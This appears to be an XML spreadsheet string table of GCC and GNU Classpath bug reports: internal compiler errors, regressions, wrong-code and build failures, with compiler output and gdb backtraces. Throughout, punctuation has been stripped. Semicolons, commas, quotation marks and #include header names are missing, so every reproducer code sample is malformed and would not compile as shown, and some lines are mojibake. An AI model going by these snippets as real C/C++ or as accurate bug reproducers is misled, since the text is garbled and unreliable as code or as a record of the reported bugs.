  </si>
  <si>
    <t>java.security.AccessControlContext forget Subject in Subject.doAs* methods</t>
  </si>
  <si>
    <t>Subject.doAs* methods push a new AccessControlContext using a
SubjectDomainCombiner and then call AccessController.doPrivileged().
Inside the PrivilegedAction nonetheless
Subject.getSubject(AccessController.getContext()) is returning null
This is due to the fact that a new combiner is inserted in the pushed
AccessControlContext in VMAccessControlContext while the given one should be used.
See the attached patch</t>
  </si>
  <si>
    <t>GCC-14241</t>
  </si>
  <si>
    <t>ICE when returning template class where template argument is a template function</t>
  </si>
  <si>
    <t>The following code:
============================
template  void f () { }
template  struct B { }
template  B &gt; g (T) { return B &gt;() }
int main (int argc char const* argv[])
{
        g(0)
        return 0
}
============================
If B &gt; is replaced with a typedef the program compiles.
The problem exists with both gcc 2.x and 3.x and I have verified it under different distributions of linux 
(and therefor gcc) plus Mac OS X (with apple's modified gcc).
The output from the compiler is:
In function `int main(int const char**)':
internal compiler error: Bus error
(or segmentation fault on other systems)</t>
  </si>
  <si>
    <t>Duff</t>
  </si>
  <si>
    <t>GCC-67882</t>
  </si>
  <si>
    <t>surprising offsetof result on an invalid array member without diagnostic</t>
  </si>
  <si>
    <t>While looking some more at bug 67872 I noticed that the logic in fold_offsetof_1 responsible for diagnosing past-the-end array element references isn't quite correct after all.  GCC fails to diagnose cases of invalid offsetof expressions whose member designator refers to an array element past the end of the array plus one.  In the following test case all but the first offsetof expressions are strictly invalid.  The second one could probably be considered an extension and accepted without diagnostic since it refers to an element just past the end of the array but all the others could and should be diagnosed.
Diagnosing the invalid expressions seems especially important because __builtin_offsetof evaluates to the wrong values for the invalid members.  I.e. __builtin_offsetof (struct A a1_1[0][1]) and __builtin_offsetof (struct A a1_1[1][0]) both evaluate to 1 and __builtin_offsetof (struct A a1_1[1][1]) evaluates to 2 rather than 3 as it would if the array element did exist.  This is also why I opened a separate bug  rather than adding this as an observation to the referenced bug.
struct A {
    char a1_1[1][1]
    int i
} a
void f (int i) {
#define Offset(m)  __builtin_offsetof (struct A m)
    _Static_assert (sizeof a.a1_1 == 1 sizeof a.a1_1 == 1)
    switch (i) {
    case Offset (a1_1[0][0]):
    case Offset (a1_1[0][1]):
    case Offset (a1_1[1][0]):
    case Offset (a1_1[1][1]):
        break
    }
}
x.c: In function â€˜fâ€™:
x.c:14:5: error: duplicate case value
     case Offset (a1_1[1][0]):
     ^
x.c:13:5: error: previously used here
     case Offset (a1_1[0][1]):
     ^</t>
  </si>
  <si>
    <t>GCC-4296</t>
  </si>
  <si>
    <t>Unable to find a register to spill in class `SIREG'.</t>
  </si>
  <si>
    <t>Compiler reports:
bug.c:36: Unable to find a register to spill in class `SIREG'.
bug.c:36: This is the insn:
(insn 201 200 202 (parallel[ 
            (set (reg:SI 2 ecx [110])
                (const_int 0 [0x0]))
 [snipped full message in attachment]
Problem probably caused by global register variable:
(register foo __asm__ (%esi))
gcc-2.95.3 compiled the code correctly.
Preprocessed input file included as attachment.
Release:
gcc version 3.0.1
Environment:
i686-pc-linux-gnu
glibc 2.1.3
How-To-Repeat:
compile bug.i using the command line given in the
attachement.</t>
  </si>
  <si>
    <t>GCC-55497</t>
  </si>
  <si>
    <t>Local array (char[]) initialized with a size taken from a static variable creates an ICE</t>
  </si>
  <si>
    <t>The following lines (41+42) crashes GCC 4.7.2 with an internal compiler error: Segmentation fault message:
https://github.com/Ummon/D-LAN/blob/1.1.0beta13/application/Core/FileManager/priv/Cache/DataWriter.cpp#L42
If the lines are rewritten as this it compiles without crashing (obviously):
    static const quint32 BUFFER_SIZE = 42
    char buffer[BUFFER_SIZE]
It compiles well with GCC 4.6.2
Command line and GCC 4.7.2 message:
make[1]: Entering directory `/home/gburri/D-LAN/application/Core/FileManager'
g++ -c -pipe -std=c++0x -g -fPIC -Wall -Wno-parentheses -D_REENTRANT -DQT_WEBKIT -DDEBUG -DFILEMANAGER_LIBRARY -DQT_NETWORK_LIB -DQT_CORE_LIB -DQT_SHARED -I/usr/share/qt4/mkspecs/linux-g++ -I. -I/usr/include/qt4/QtCore -I/usr/include/qt4/QtNetwork -I/usr/include/qt4 -I. -I../.. -I.tmp/debug -o .tmp/debug/DataWriter.o priv/Cache/DataWriter.cpp
priv/Cache/DataWriter.cpp: In constructor 'FM::DataWriter::DataWriter(FM::Chunk&amp;)':
priv/Cache/DataWriter.cpp:62:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>greg.burri</t>
  </si>
  <si>
    <t>GCC-19607</t>
  </si>
  <si>
    <t>Build fails on MSYS/MingGW because of incorrect SYSTEM_HEADER_DIR</t>
  </si>
  <si>
    <t>On MSYS the system headers are found in /mingw/include ... I made a modified
gcc/config/i386/t-mingw32 adding:
NATIVE_SYSTEM_HEADER_DIR = /mingw/include
And it works here.
Also the configure script needs to be started with a relative path or the
srcdir anyway needs to be relative or gengtype will fail. This problem is
documented in bug #16024 (gengtype doesn't crash here but it still fails not
finding a path)</t>
  </si>
  <si>
    <t>samuel.audet</t>
  </si>
  <si>
    <t>GCC-56515</t>
  </si>
  <si>
    <t>[4.8 Regression] location references block not in block tree verify_gimple failed (LTO + profile)</t>
  </si>
  <si>
    <t>GCC 4.8.0 20130303 (experimental):
foo.c: In function 'foo':
foo.c:1:6: error: location references block not in block tree
 void foo(void) { }
      ^
# .MEM_10 = VDEF 
bar = 1
foo.c:1:6: internal compiler error: verify_gimple failed
0x85df8f2 verify_gimple_in_cfg(function*)
	../../gcc-4.8/gcc/tree-cfg.c:4727
0x84d520c execute_function_todo
	../../gcc-4.8/gcc/passes.c:1963
0x84d455d do_per_function
	../../gcc-4.8/gcc/passes.c:1701
0x84d532d execute_todo
	../../gcc-4.8/gcc/passes.c:1996
0x84d57a1 execute_one_ipa_transform_pass
	../../gcc-4.8/gcc/passes.c:2182
0x84d5873 execute_all_ipa_transforms()
	../../gcc-4.8/gcc/passes.c:2208
0x8206775 expand_function
	../../gcc-4.8/gcc/cgraphunit.c:1633
0x8206cda expand_all_functions
	../../gcc-4.8/gcc/cgraphunit.c:1744
0x8207763 compile()
	../../gcc-4.8/gcc/cgraphunit.c:2042
0x816b85d lto_main()
	../../gcc-4.8/gcc/lto/lto.c:3396</t>
  </si>
  <si>
    <t>GCC-26449</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in loop invariant motion</t>
  </si>
  <si>
    <t>ICEs with -march=pentium4 -O1 -ftree-vectorize
compiles with -march=i686 -O1 -ftree-vectorize
../../../../src/gcc-4.2/libgfortran/generated/matmul_i4.c: In function 'matmul_i4':
../../../../src/gcc-4.2/libgfortran/generated/matmul_i4.c:274: internal compiler error: Segmentation fault
backtrace:
(gdb) run -quiet -v -I. -I../../../../src/gcc-4.2/libgfortran -I. -I../../../../src/gcc-4.2/libgfortran/../gcc -I../../../../src/gcc-4.2/libgfortran/../gcc/config -I../.././gcc -iprefix /scratch/obj/gcc-4.2/gcc/../lib/gcc/i686-linux-gnu/4.2.0/ -isystem /scratch/obj/gcc-4.2/./gcc/include -DHAVE_CONFIG_H -D_GNU_SOURCE -DPIC -isystem /opt/gcc-4.2//i686-linux-gnu/include -isystem /opt/gcc-4.2//i686-linux-gnu/sys-include -iquote../../../../src/gcc-4.2/libgfortran/io ../../../../src/gcc-4.2/libgfortran/generated/matmul_i4.c -quiet -dumpbase matmul_i4.c -march=pentium4 -auxbase-strip .libs/matmul_i4.o -O1 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -std=gnu99 -version -ftree-vectorize -fPIC -o /tmp/ccgnCLQw.s
Starting program: /scratch/obj/gcc-4.2/gcc/cc1 -quiet -v -I. -I../../../../src/gcc-4.2/libgfortran -I. -I../../../../src/gcc-4.2/libgfortran/../gcc -I../../../../src/gcc-4.2/libgfortran/../gcc/config -I../.././gcc -iprefix /scratch/obj/gcc-4.2/gcc/../lib/gcc/i686-linux-gnu/4.2.0/ -isystem /scratch/obj/gcc-4.2/./gcc/include -DHAVE_CONFIG_H -D_GNU_SOURCE -DPIC -isystem /opt/gcc-4.2//i686-linux-gnu/include -isystem /opt/gcc-4.2//i686-linux-gnu/sys-include -iquote../../../../src/gcc-4.2/libgfortran/io ../../../../src/gcc-4.2/libgfortran/generated/matmul_i4.c -quiet -dumpbase matmul_i4.c -march=pentium4 -auxbase-strip .libs/matmul_i4.o -O1 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -std=gnu99 -version -ftree-vectorize -fPIC -o /tmp/ccgnCLQw.s
ignoring nonexistent directory /opt/gcc-4.2//i686-linux-gnu/include
ignoring nonexistent directory /opt/gcc-4.2//i686-linux-gnu/sys-include
ignoring nonexistent directory /scratch/obj/gcc-4.2/gcc/../lib/gcc/i686-linux-gnu/4.2.0/include
ignoring nonexistent directory /scratch/obj/gcc-4.2/gcc/../lib/gcc/i686-linux-gnu/4.2.0/../../../../i686-linux-gnu/include
ignoring nonexistent directory /opt/gcc-4.2//lib/gcc/i686-linux-gnu/4.2.0/../../../../i686-linux-gnu/include
ignoring duplicate directory .
#include ... search starts here:
 ../../../../src/gcc-4.2/libgfortran/io
#include  search starts here:
 .
 ../../../../src/gcc-4.2/libgfortran
 ../../../../src/gcc-4.2/libgfortran/../gcc
 ../../../../src/gcc-4.2/libgfortran/../gcc/config
 ../.././gcc
 /scratch/obj/gcc-4.2/./gcc/include
 /usr/local/include
 /opt/gcc-4.2//include
 /opt/gcc-4.2//lib/gcc/i686-linux-gnu/4.2.0/include
 /usr/include
End of search list.
GNU C version 4.2.0 20060223 (experimental) (i686-linux-gnu)
        compiled by GNU C version 4.2.0 20060223 (experimental).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129565
Compiler executable checksum: a63b49e33c2474f6deba206c45b9f4c2
Program received signal SIGSEGV Segmentation fault.
emit_move_insn (x=0xb7b0ad70 y=0x0) at ../../../src/gcc-4.2/gcc/expr.c:3176
3176      gcc_assert (mode != BLKmode
(gdb) bt
#0  emit_move_insn (x=0xb7b0ad70 y=0x0)
    at ../../../src/gcc-4.2/gcc/expr.c:3176
#1  0x0814a80c in move_invariant_reg (loop=0x858a650 invno=Variable invno is not available.
)
    at ../../../src/gcc-4.2/gcc/loop-invariant.c:1164
#2  0x0814b529 in move_loop_invariants (loops=0x85ab780)
    at ../../../src/gcc-4.2/gcc/loop-invariant.c:1203
#3  0x0812b398 in rtl_move_loop_invariants ()
    at ../../../src/gcc-4.2/gcc/loop-init.c:252
#4  0x0832b847 in execute_one_pass (pass=0x84d4c60)
    at ../../../src/gcc-4.2/gcc/passes.c:862
#5  0x0832b9a5 in execute_pass_list (pass=0x84d4c60)
    at ../../../src/gcc-4.2/gcc/passes.c:909
#6  0x0832b9b8 in execute_pass_list (pass=0x84d4ba0)
    at ../../../src/gcc-4.2/gcc/passes.c:910
#7  0x0832b9b8 in execute_pass_list (pass=0x84d5f20)
    at ../../../src/gcc-4.2/gcc/passes.c:910
#8  0x080aaa44 in tree_rest_of_compilation (fndecl=0xb7c20080)
    at ../../../src/gcc-4.2/gcc/tree-optimize.c:412
#9  0x08052315 in c_expand_body (fndecl=0xb7c20080)
    at ../../../src/gcc-4.2/gcc/c-decl.c:6689
#10 0x0836a353 in cgraph_expand_function (node=0xb7c20200)
    at ../../../src/gcc-4.2/gcc/cgraphunit.c:1101
#11 0x0836ab4d in cgraph_optimize ()
    at ../../../src/gcc-4.2/gcc/cgraphunit.c:1166
#12 0x08057b78 in c_write_global_declarations ()
    at ../../../src/gcc-4.2/gcc/c-decl.c:7804
#13 0x0830f68e in toplev_main (argc=41 argv=0xbfc041d4)
    at ../../../src/gcc-4.2/gcc/toplev.c:1012
#14 0x0809b7ea in main (argc=Cannot access memory at address 0x0
) at ../../../src/gcc-4.2/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-3141</t>
  </si>
  <si>
    <t>DR 243: basic_istream::get and getline when sentry reports failure</t>
  </si>
  <si>
    <t>see
http://anubis.dkuug.dk/jtc1/sc22/wg21/docs/lwg-defects.html#243
Release:
20010612 cvs
Environment:
source
How-To-Repeat:
observe istream::get(char_type* __s streamsize __n char_type __delim)
in line 536 of include/bits/istream.tcc
note that on line 573: *__s = char_type(NULL)
observe istream::getline(char_type* __s streamsize __n char_type __delim)
in line 627 of include/bits/istream.tcc
note on line 673: *__s = char_type(NULL)</t>
  </si>
  <si>
    <t>GCC-71279</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE on trunk gcc with knl target</t>
  </si>
  <si>
    <t>Created attachment 38567
Reproducer
Run:
&gt; g++ -std=c++11 -O3 -march=knl -o out.o -c crash.cpp
Output:
crash.cpp: In function 'void fn1()':
crash.cpp:8:6: internal compiler error: in fold_convert_loc at fold-const.c:2360
 void fn1() {
      ^~~
0xa86b55 fold_convert_loc(unsigned int tree_node* tree_node*)
        /export/users/gnutester/stability/svn/trunk/gcc/fold-const.c:2360
0xa73d4c fold_ternary_loc(unsigned int tree_code tree_node* tree_node* tree_node* tree_node*)
        /export/users/gnutester/stability/svn/trunk/gcc/fold-const.c:11624
0xacf931 fold_gimple_assign
        /export/users/gnutester/stability/svn/trunk/gcc/gimple-fold.c:408
0xad4e2f fold_stmt_1
        /export/users/gnutester/stability/svn/trunk/gcc/gimple-fold.c:3762
0xe6a316 optimize_stmt
        /export/users/gnutester/stability/svn/trunk/gcc/tree-ssa-dom.c:1792
0xe6a316 dom_opt_dom_walker::before_dom_children(basic_block_def*)
        /export/users/gnutester/stability/svn/trunk/gcc/tree-ssa-dom.c:1380
0x13a2102 dom_walker::walk(basic_block_def*)
        /export/users/gnutester/stability/svn/trunk/gcc/domwalk.c:265
0xe6b578 execute
        /export/users/gnutester/stability/svn/trunk/gcc/tree-ssa-dom.c:614
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
&gt; gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/export/users/amitrokh/gcc_trunk/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/users/gnutester/stability/svn/trunk/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --with-pkgversion=Revision=236669/svn-rev:236669/ --prefix=/export/users/gnutester/stability/work/trunk/64/install --enable-languages=cc++fortranjavalto
Thread model: posix
gcc version 7.0.0 20160524 (experimental) (Revision=236669/svn-rev:236669/)</t>
  </si>
  <si>
    <t>GCC-34970</t>
  </si>
  <si>
    <t>[4.3 regression] name mangling broken for __attributte__((fastcall))</t>
  </si>
  <si>
    <t>BOOL FASTCALL DdHmgDestroy()
 .def	_@DdHmgDestroy@0	.scl	2	.type	32	.endef
 Cannot export @DdHmgDestroy@0: symbol not found</t>
  </si>
  <si>
    <t>GCC-8914</t>
  </si>
  <si>
    <t>parentheses not accepted around constructor call in return statement</t>
  </si>
  <si>
    <t>If a return statement has parentheses around the expression and the expression returns a temporary object created by calling the constructor without arguments g++ emits a parse error.  See attached file.  This problem seems to exist in many versions of gcc.  A workaround is to remove the parentheses enclosing the return expression.
Release:
3.2
Environment:
Red Hat Linux
How-To-Repeat:
g++ -c return.cpp</t>
  </si>
  <si>
    <t>tkarkanis</t>
  </si>
  <si>
    <t>CLASSPATH-26627</t>
  </si>
  <si>
    <t>getComponentAt should not ignore invisible children</t>
  </si>
  <si>
    <t>Run this applet:
gcjappletviewer http://www.chessgames.com/perl/chessgame?gid=1044316
Click Preferences -&gt; Hide Games List
Then click Matulovic Milan's third move which should show a TextArea containing notes by Bobby Fischer on top of the games list.  However each TextArea seems to be shown then moved behind the other in an endless loop.</t>
  </si>
  <si>
    <t>GCC-2951</t>
  </si>
  <si>
    <t>--target=sh-elf fails to build due to missing patch</t>
  </si>
  <si>
    <t>GCC fails to build for --target=sh-elf:
gcc -c -DCROSS_COMPILE -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I../../gcc-3.0-20010525/gcc -I../../gcc-3.0-20010525/gcc/. -I../../gcc-3.0-20010525/gcc/config -I../../gcc-3.0-20010525/gcc/../include ../../gcc-3.0-20010525/gcc/dwarf2out.c -o dwarf2out.o
../../gcc-3.0-20010525/gcc/dwarf2out.c: In function `dwarf2out_frame_debug':
../../gcc-3.0-20010525/gcc/dwarf2out.c:1598: `ACCUMULATE_OUTGOING_ARGS' undeclared (first use in this function)
../../gcc-3.0-20010525/gcc/dwarf2out.c:1598: (Each undeclared identifier is reported only once
../../gcc-3.0-20010525/gcc/dwarf2out.c:1598: for each function it appears in.)
../../gcc-3.0-20010525/gcc/dwarf2out.c: In function `output_call_frame_info':
../../gcc-3.0-20010525/gcc/dwarf2out.c:1777: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc-3.0-20010525/gcc/dwarf2out.c: In function `int_loc_descriptor':
../../gcc-3.0-20010525/gcc/dwarf2out.c:7075: warning: integer constant is unsigned in ANSI C signed with -traditional
../../gcc-3.0-20010525/gcc/dwarf2out.c:7087: warning: integer constant is unsigned in ANSI C signed with -traditional
make[1]: *** [dwarf2out.o] Error 1
make[1]: Leaving directory `/home/tm/gcc-3.0-beta/gcc-build-sh-elf/gcc'
make: *** [all-gcc] Error 2
This patch from CVS head needs to be backported to 3.0:
2001-03-18  Richard Henderson  
        * defaults.h (ACCUMULATE_OUTGOING_ARGS PUSH_ARGS): Move from ...
        * calls.c: ... here.
        * combine.c expr.c final.c function.c toplev.c: Don't provide
        defaults for them here.
Toshi
Release:
3.0-branch
Environment:
i686-linux (RH 7.l0)
How-To-Repeat:
./configure --target=sh-elf  make</t>
  </si>
  <si>
    <t>GCC-79666</t>
  </si>
  <si>
    <t>[5 Regression] wrong code (SIGFPE) at -O2 on x86_64-linux-gnu (in both 32-bit and 64-bit modes)</t>
  </si>
  <si>
    <t>It seems to be a very recent regression. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170221 (experimental) [trunk revision 245619] (GCC) 
$ 
$ gcc-trunk -Os small.c ./a.out
$ gcc-6.2 -O2 small.c ./a.out
$ 
$ gcc-trunk -O2 small.c
$ ./a.out
Floating point exception (core dumped)
$ 
---------------------------------------------------------
struct
{
  unsigned a:6
} b
int c e g = 7
char d f = 6 h = -10
void fn1 ()
{
  for ( c &lt; 9 c++)
    {
      if (f)
        g = ~(~0 / (g ^ e))
      b.a = ~0
      d = ~((h ^ b.a) 
      e = ~0
      if (d &lt; 127 || f &lt; 1)
        continue
      g = 0
    }
}
int main ()
{
  fn1 ()
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-458</t>
  </si>
  <si>
    <t>[alpha Digital Unix 4] small number floating-point exception</t>
  </si>
  <si>
    <t>zsh: floating point exception (core dumped)  a.out
Notes: 
 multiplying a number of approx 1e-314 (should be 0 rounding errors)
 with another yields the error.
 everything &gt; 1e-309 is ok
 everything &lt; 1e-324 is ok (identical 0)
 core dumped in line of multiplication * needs to be in
 a subroutine same line in main doesn't give an error.
 Same code on Linux yields no problems
 funny: gdb 4.16 (alpha-dec-osf4.0) does very much the same:
  (gdb) p 2.0*1e-307
  $7 = 1.9999999999999998e-307
  (gdb) p 2.0*1e-308
  Erroneous arithmetic operation.
  (gdb) p 2.0*1e-323
  Erroneous arithmetic operation.
  (gdb) p 2.0*1e-324
  $8 = 0
Release:
gcc version 2.95.2 19991024 and several older ones
Environment:
system OSF1 V4.0 878 alpha (Digital Unix 4.0d)
compiler: gcc -v testi.c
Reading specs from /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/specs
gcc version 2.8.1
 /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/cpp -lang-c -v -undef -D__GNUC__=2 -D__GNUC_MINOR__=8 -Dunix -D__osf__ -D__alpha -D__alpha__ -D_LONGLONG -DSYSTYPE_BSD -D_SYSTYPE_BSD -D__unix__ -D__osf__ -D__alpha -D__alpha__ -D_LONGLONG -D__SYSTYPE_BSD__ -D_SYSTYPE_BSD -D__unix -D__SYSTYPE_BSD -Asystem(unix) -Asystem(xpg4) -Acpu(alpha) -Amachine(alpha) -D__LANGUAGE_C__ -D__LANGUAGE_C -DLANGUAGE_C testi.c /tmp/ccaalnCa.i
GNU CPP version 2.8.1
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/gnu/alpha-dec-osf4.0d/include
 /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/include
 /usr/include
End of search list.
 /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/cc1 /tmp/ccaalnCa.i -quiet -dumpbase testi.c -version -o /tmp/ccaalnCa.s
GNU C version 2.8.1 (alpha-dec-osf4.0d) compiled by GNU C version 2.8.1.
 as -g -nocpp -O0 -o /tmp/ccaalnCa1.o /tmp/ccaalnCa.s
 /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/mips-tfile -v -o /tmp/ccaalnCa1.o /tmp/ccaalnCa.s
mips-tfile version 2.8.1
 /usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1/ld -G 8 -O1 -call_shared /usr/lib/cmplrs/cc/crt0.o -L/usr/gnu/lib/gcc-lib/alpha-dec-osf4.0d/2.8.1 -L/usr/gnu/alpha-dec-osf4.0d/lib -L/usr/lib/cmplrs/cc -L/usr/gnu/lib /tmp/ccaalnCa1.o -lgcc -lc -lgcc
How-To-Repeat:
void dummy(double w double v)
{
  double r
  r = w*v
  return
}
int main()
{
  dummy(2.01e-314)
  return(0)
}</t>
  </si>
  <si>
    <t>kroemer</t>
  </si>
  <si>
    <t>GCC-71762</t>
  </si>
  <si>
    <t>[5 Regression] ~X &amp; Y to X &lt; Y doesn't work for uninitialized values</t>
  </si>
  <si>
    <t>In the following minimal test built with: g++ -O2
---
#include 
struct S
{
  void* get()
  {
    return NULL
  }
  ~S()
  {
    printf(dtor\n)
  }
}
void foo(void* x)
{
  printf(foo\n)
}
void testFunc(int len)
{
  bool __cond59
  bool __cond60
  foo ((__cond60 = len &gt; 1 __cond60) ? NULL : (__cond59 = len == 1 __cond59) ? S().get() : NULL)
  if (!__cond60)
    {
      if (__cond59)
        {
          printf(fail\n)
        }
    }
}
void check(void (*dg)(int))
{
  dg(2)
}
int main()
{
  check(
}
---
The optimizer simplifies the two if statements as: `if (__cond59 &gt; __cond60)` where __cond59 is never initialized in `testFunc`.
This regression is only present in 4.9.  gcc-4.8 and gcc-5 are unaffected.
The commit that caused the regression was r204194 and it went away after r217496.</t>
  </si>
  <si>
    <t>GCC-71500</t>
  </si>
  <si>
    <t>regex::icase only works on first character in a range</t>
  </si>
  <si>
    <t>The code below should match regex in all 4 cases: 
#include 
#include 
#include 
using namespace std
void check(const string&amp; s regex re) {
    cout &lt;&lt; s &lt;&lt;  :  &lt;&lt; (regex_match(s re) ? Match : Nope) &lt;&lt; endl
}
int main() {
    regex re1([A-F]+ regex::icase)
    check(aaa re1)
    check(AAA re1)
    check(fff re1)
    check(FFF re1)
}
Instead:
$ g++ -std=c++11 test.cc -o test &amp;&amp; ./test
aaa : Match
AAA : Match
fff : Nope
FFF : Match
$ g++ -v
Reading specs from /disk1/pkgs/gcc/5.2/lib64/gcc/x86_64-suse-linux/5.2.0/specs
COLLECT_GCC=/usr/pkgs/gcc/5.2/.bin/g++
COLLECT_LTO_WRAPPER=/disk1/pkgs/gcc/5.2/libexec/gcc/x86_64-suse-linux/5.2.0/lto-wrapper
Target: x86_64-suse-linux
Configured with: ./configure --prefix=/usr/pkgs/gcc/5.2 --libdir=/usr/pkgs/gcc/5.2/lib64 --libexecdir=/usr/pkgs/gcc/5.2/libexec --bindir=/usr/pkgs/gcc/5.2/bin --with-ppl=/usr/pkgs/gcc/5.2 --enable-cloog-backend=ppl --with-cloog=/usr/pkgs/gcc/5.2 --with-libelf=/usr/pkgs/gcc/5.2 --with-mpfr=/usr/pkgs/gcc/5.2 --with-gmp=/usr/pkgs/gcc/5.2 --with-mpc=/usr/pkgs/gcc/5.2 --disable-gnu-unique-object --enable-lto --enable-languages=cc++objcfortranjava --build=x86_64-suse-linux --host=x86_64-suse-linux --target=x86_64-suse-linux
Thread model: posix
gcc version 5.2.0 (GCC)</t>
  </si>
  <si>
    <t>glexey</t>
  </si>
  <si>
    <t>GCC-6308</t>
  </si>
  <si>
    <t>Compile G4ReactionDynamics.cc from GEANT4.4.0 last corected
file I have
/usr/local/bin/g++ -pipe -fno-for-scope -DGNU_GCC -fPIC -DG4OPTIMISE -DG4USE_STL -Iinclude
 -I/home/geant4.3.2/source/global/STLInterface -I/home/lhcxx/specific/redhat61/gcc-2.95.2/
CLHEP/pro/include -I/usr/local/include/g++-3 -I/usr/local/include -I/usr/local/lib/gcc-lib
  src/G4ReactionDynamics.cc
src/G4ReactionDynamics.cc: In method `void G4ReactionDynamics::Rotate(double const G4ThreeVector &amp; const G4ReactionProduct &amp; const G4DynamicParticle * const G4Nucleus &amp; G4ReactionProduct &amp; G4ReactionProduct &amp; G4FastVector &amp; G4int &amp;)':
src/G4ReactionDynamics.cc:2696: Internal compiler error.
src/G4ReactionDynamics.cc:2696: Please submit a full bug report.
src/G4ReactionDynamics.cc:2696: See  for instructions.
cpp0: output pipe has been closed
make: *** [/home/simul/tmp/Linux-g++/G4hadronic_util/G4ReactionDynamics.o] Error 1
Release:
gcc version 2.95.3 20010315 (release)
Environment:
redhat7.2 2.4.9-13smp</t>
  </si>
  <si>
    <t>dusan, bruncko</t>
  </si>
  <si>
    <t>GCC-27366</t>
  </si>
  <si>
    <t>ada build fails as cygwin does not have clearenv</t>
  </si>
  <si>
    <t>cygwin does not have the clearenv function so ada compliation dies in ada/env.c.  Testing a patch to use unsetenv path.</t>
  </si>
  <si>
    <t>GCC-10645</t>
  </si>
  <si>
    <t>[64-bit] Incorrect 64bit double alignment in nested struct</t>
  </si>
  <si>
    <t>in the example below the struct A has only double as its member and is 8-byte aligned in 64bit. struct B has struct A as it's member however is only 4-byte aligned. When we add aother member after double in struct A struct B becomes 8-byte aligned.
/*test case t.c*/
struct A{
         double  a1
         /*int     a2*/
}sa
struct B{
         char    b1
         struct A     b2
}sb
int main()
{
   printf(alignof sa=%d\n__alignof__(sa))
   printf(sizeof  sa=%d\nsizeof(sa))
   printf(alignof sb=%d\n__alignof__(sb))
   printf(sizeof  sb=%d\nsizeof(sb))
}
Release:
gcc version 3.2
Environment:
System Type:
Linux Version 2.4.19 SuSE SLES 8 (ppc) - Kernel 2.4.19-ul1-ppc64-SMP (36).
GNU assembler version 2.12.90.0.15 (powerpc-suse-linux) using BFD version 2.12.9
0.0.15 20020717 (SuSE)
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-
prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/us
r/lib --enable-languages=cc++f77objcjavaada --enable-libgcj --with-gxx-incl
ude-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared
--enable-__cxa_atexit powerpc-suse-linux
Thread model: posix
gcc version 3.2
How-To-Repeat:
/opt/cross/bin/powerpc64-linux-g++ t.c
a.out</t>
  </si>
  <si>
    <t>jingye</t>
  </si>
  <si>
    <t>GCC-67622</t>
  </si>
  <si>
    <t>[6 regression] Solaris/SPARC bootstrap fails compiling stage2 stdc++.h.gch/O2ggnu++0x.gch</t>
  </si>
  <si>
    <t>Between 20150911 and 20150917 (r227886) Solaris/SPARC bootstrap started to fail
in stage2:
$ /var/gcc/regression/trunk/11-gcc/build/./gcc/xgcc -shared-libgcc -B/var/gcc/regression/trunk/11-gcc/build/./gcc -nostdinc++ -L/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/src -L/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/src/.libs -L/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/libsupc++/.libs -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include    -x c++-header -nostdinc++ -g -O2  -I/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sparc-sun-solaris2.11 -I/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include -I/vol/gcc/src/hg/trunk/local/libstdc++-v3/libsupc++  -O2 -g -std=gnu++0x /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h -o sparc-sun-solaris2.11/bits/stdc++.h.gch/O2ggnu++0x.gch
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:39:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
